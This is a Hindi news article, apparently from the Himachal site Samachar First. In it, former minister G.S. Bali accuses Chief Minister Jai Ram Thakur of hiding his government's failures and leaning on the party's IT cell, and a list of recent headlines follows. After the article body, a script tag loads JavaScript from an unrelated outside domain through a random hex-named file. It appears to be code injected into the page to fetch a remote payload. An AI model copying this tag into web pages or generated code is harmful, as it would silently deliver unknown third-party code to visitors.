मुख्यमंत्री नाकामियां और कमजोरियां छिपाने के लिए अपने IT सेल की मांग रहे मददः GS बाली

<p>पूर्व मंत्री जीएस बाली ने मुख्यमंत्री जयराम ठाकुर पर तंज कसा है। उन्होंने कहा कि जनता की उम्मीदों पर खरा उतरने और प्रदेश को तरक्की की राह पर ले जाने में भाजपा सरकार का तंत्र पूरी तरह विफल हो चुका है। उन्होंने सोशल मीडिया में अपना बयान जारी करते हुए कहा कि जिस आलोचना और जबाबदेही को मुख्यमंत्री कांग्रेस का दुष्प्रचार बता रहे हैं वो कोई प्रचार नहीं, बल्कि आम जनता की रोज घर-घर में हो रही चर्चा है। जिसका निष्कर्ष जनता यही निकालती है कि सरकार विफल है और मुख्यमंत्री ख़ुद फ़ैसले लेने और उनके क्रियान्वन में असफल हैं।</p>

<p>उन्होंने कहा कि कोई भी मंत्री फील्ड में नहीं है न अपने विभाग में जमीनी कार्यों के लिए प्रतिबद्ध है। मंत्री अपनी पावर का प्रयोग अभी सिर्फ नई-नई खरीददारी में ही कर पा रहे हैं। उस पावर से आम जनता और प्रदेश की तरक्की के लिए क्या करना है अफसरशाही से कैसे काम लेना है उसमें अभी फिसड्डी हैं। मुख्यमंत्री अपनी नाकामियां और कमजोरियां छिपाने के लिए&nbsp; कभी पार्टी के कार्यकर्ताओं तो कभी&nbsp; IT सेल की मदद मांगते फिर रहे हैं। बाली ने कहा कि सच यह है कि खुद भाजपा का कैडर भी यू-टर्न सरकार और उसकी ढीली प्रशासनिक पकड़ के कारण आम जनता के बीच किरकिरी से परेशान और त्रस्त है। सत्ताधारी पार्टी के कार्यकर्ताओं और IT सेल का काम सरकार के कार्यों को जनता के बीच पहुंचाने का है। उन्हें हथियार बनाकर विपक्ष से उलझने से कुछ नहीं होगा।</p>

<p>सरकार की छवि जनता में अक्षम सरकार की बन चुकी है। सरकार के अफलातून फैसलों की आलोचना सिर्फ कोई कांग्रेसी या विपक्ष नहीं कर रहा बल्कि इन नीतियों से त्रस्त आमजन कर रहा है। इसलिए सरकार कॉम पर ध्यान दे जो दो वर्ष की सत्ता अब बची है उसमें प्रादेशिक हित में कोई बड़े कार्य करे। अच्छा करेंगे तो जनता में खुद अच्छा संदेश जाएगा। किसी सेल की जरूरत विपक्ष को कोसने के लिए नहीं होगी। हिमाचल की जनता शिक्षित और जागरूक है। अच्छा बुरा समझती है किसी तंत्र-मंत्र से उसे बरगलाया नहीं जा सकता न भर्मित किया जा सकता है। जनता की आवाज को दुष्प्रचार की संज्ञा सरकार न दे बल्कि आत्ममंथन करे।</p>

<p><img src=”/media/gallery/images/image(1683).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

अगले पांच साल देश के विकास में मील का पत्थर साबित होंगे : जयराम ठाकुर

शिमला/कोटखाई : नेता प्रतिपक्ष जयराम ठाकुर ने कहा कि आने वाले पांच साल भारत के…

13 hours ago

करसोग में भाजपा को बड़ा झटका, टिकट के दावेदार रहे युवराज कांग्रेस में शामिल

करसोग (मंडी): भाजपा को करसोग विधानसभा क्षेत्र में बड़ा झटका लगा है। बीते विधानसभा चुनाव…

13 hours ago

जिस फ़िल्म का डायरेक्टर फ्लॉप, हीरोइन कितनी भी सुपरस्टार हो उस फ़िल्म का फ्लॉप होना तय : मुख्यमंत्री

करसोग (मंडी): मुख्यमंत्री सुखविंदर सिंह सूक्खू ने वीरवार को मंडी जिला के करसोग में लोकसभा…

13 hours ago

आईपीएल मैच के दौरान स्वास्थ्य सुविधाओं के लिए प्लान तैयार: सीएमओ

धर्मशाला, 02 मई: धर्मशाला में पांच तथा नौ मई को प्रस्तावित आईपीएल टी-टवेंटी मैच के…

13 hours ago

फसल विविधीकरण प्रोत्साहन परियोजना के कार्यों का किया निरीक्षण

धर्मशाला 02 मई: जाइका- मिशन, हिमाचल प्रदेश फसल विविधीकरण प्रोत्साहन परियोजना (चरण-द्वितीय) की प्रगति की…

13 hours ago

केलांग में किया ईवीएम वीवीपेट मशीनों का प्रथम  रेंडमाइजेशन

केलांग 2 मई: ज़िला लाहौल स्पीति में लोकसभा व विधानसभा उपचुनाव को लेकर  (21)-लाहौल स्पीति विधानसभा…

13 hours ago